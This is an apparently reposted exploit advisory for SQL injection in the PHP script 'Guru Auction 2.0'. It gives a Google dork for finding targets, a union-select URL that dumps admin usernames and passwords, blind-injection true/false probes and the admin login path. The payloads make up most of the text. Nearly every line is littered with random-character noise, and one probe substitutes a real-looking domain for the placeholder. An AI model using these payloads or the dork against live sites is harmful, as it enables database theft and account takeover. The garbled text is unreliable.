Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
$ F# {/ B6 L8 @. k. U& g8 x/ R) i, n- y5 w6 O; N7 X$ ]/ _
作者 : v3n0m+ E% J T5 t+ t
应用 : Guru Auction 2.0
& H1 P# ~# s3 O1 Q. g: p( HPrice : $49$ V; t) B. e6 i- R c6 U
Vendor : http://www.guruscript.com/8 [2 G Z$ M8 `& ~: p B Y, j, X
Google Dork : inurl:subcat.php?cate_id=& I* i/ `4 J. \* a$ I
: n. v5 ] V+ k+ o: J$ i( {
SQLi p0c:6 x/ A) P& M" T* x" {; z
~~~~~~~~~~
* b$ |' e0 v* r3 S5 R. ?$ w6 {http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
8 a( \+ h, k) m# i n. t: x 1 K' m- b5 Y5 i
, [" j* A6 s: d盲注 p0c:
. h' l7 P0 Z2 G8 O~~~~~~~~~~! w" K/ N& C# Q( m+ G
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true: z M; C$ U7 l+ c# I
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
W+ l- j- w* X
% a/ X8 O$ S' a9 _* z+ i' K管理登录入口:$ h0 B1 r ]) N5 w% y
~~~~~~~~~~. y7 k G7 W" ~4 i
http://domain.tld/[path]/admin/! O" G8 R* V9 v) ]4 F
|